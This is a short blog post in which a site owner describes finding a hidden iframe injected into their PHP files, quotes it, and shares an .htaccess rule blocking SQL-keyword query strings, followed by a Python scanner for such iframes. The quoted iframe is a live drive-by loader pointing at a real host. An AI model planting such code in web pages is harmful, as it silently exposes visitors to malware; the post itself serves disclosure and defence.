HTML Injection

malware
Yesterday I got a message from Google about my AdWords account having been suspended, the reason being a suspected malware infection on my site. I then checked my site code and realised that yes, I had been compromised: the code below had somehow been added to my PHP files:

<div style="display:none"><iframe width=415 height=797 src="http://age-inf.ru:8080/index.php" ></iframe></div><div style="display:none"></div><div style="display:none">

From the above, it seems this loads a page in the background within an iframe without the user's consent; I don't even want to know what happens when you load that URL. Anyway, for those of you who might find yourselves in a similar situation, I managed to solve this by altering my .htaccess file and adding the contents below to it:

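# Answer 403 Forbidden when the query string has a markup/quote character followed by an SQL keyword
RewriteEngine On
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]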

Some people are suggesting playing around with mod_rewrite, but I’m not too sure if that's the safest way to deal with it. One question remains: how was the HTML injected in the first place?
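To check which files on disk carry the hidden-iframe pattern shown above, the following added example (not code from the original post) walks a web root and reports every `display:none` div that wraps an iframe pointing at a host outside an allow-list. The file suffixes, the function names and the `injected.example`, `videos.example` and `stats.example` hosts are assumptions made up for the example.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

Q = "\"'\u201c\u201d\u2018\u2019"  # straight and typographic quotes
# A display:none <div> immediately wrapping an <iframe>, as in the post.
HIDDEN_IFRAME = re.compile(
    rf"<div[^>]*style\s*=\s*[{Q}]?[^>]*display\s*:\s*none[^>]*>\s*"
    rf"<iframe[^>]*\bsrc\s*=\s*[{Q}]?(?P<src>[^\s>{Q}]+)",
    re.IGNORECASE,
)
SCAN_SUFFIXES = {".php", ".inc", ".html", ".htm", ".tpl"}  # assumed file types

def find_hidden_iframes(text, trusted_hosts=frozenset()):
    """Return (line_number, src) for hidden iframes that load an untrusted host."""
    hits = []
    for m in HIDDEN_IFRAME.finditer(text):
        host = urlparse(m.group("src")).hostname or ""
        if host and host not in trusted_hosts:  # relative src has no host: skip
            hits.append((text.count("\n", 0, m.start()) + 1, m.group("src")))
    return hits

def scan_tree(root, trusted_hosts=frozenset()):
    """Return (relative_path, line_number, src) for every hit under root."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            text = path.read_text(encoding="utf-8", errors="replace")
            for line, src in find_hidden_iframes(text, trusted_hosts):
                findings.append((str(path.relative_to(root)), line, src))
    return findings

def demo():
    """Scan a constructed web root: one injected file, one clean, one trusted."""
    bad = ('<div style="display:none"><iframe width=415 height=797 '
           'src="http://injected.example:8080/index.php" ></iframe></div>')
    samples = {  # constructed sample files, not real site content
        "index.php": "<?php echo 'home'; ?>\n" + bad + "\n",
        "video.php": '<iframe src="https://videos.example/embed/1"></iframe>\n',
        "inc/stats.html": bad.replace("injected.example:8080", "stats.example"),
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            target = Path(root, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root, trusted_hosts={"stats.example"})

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point `scan_tree` at the real document root and compare the flagged files against a known-good backup or version-control copy before removing anything.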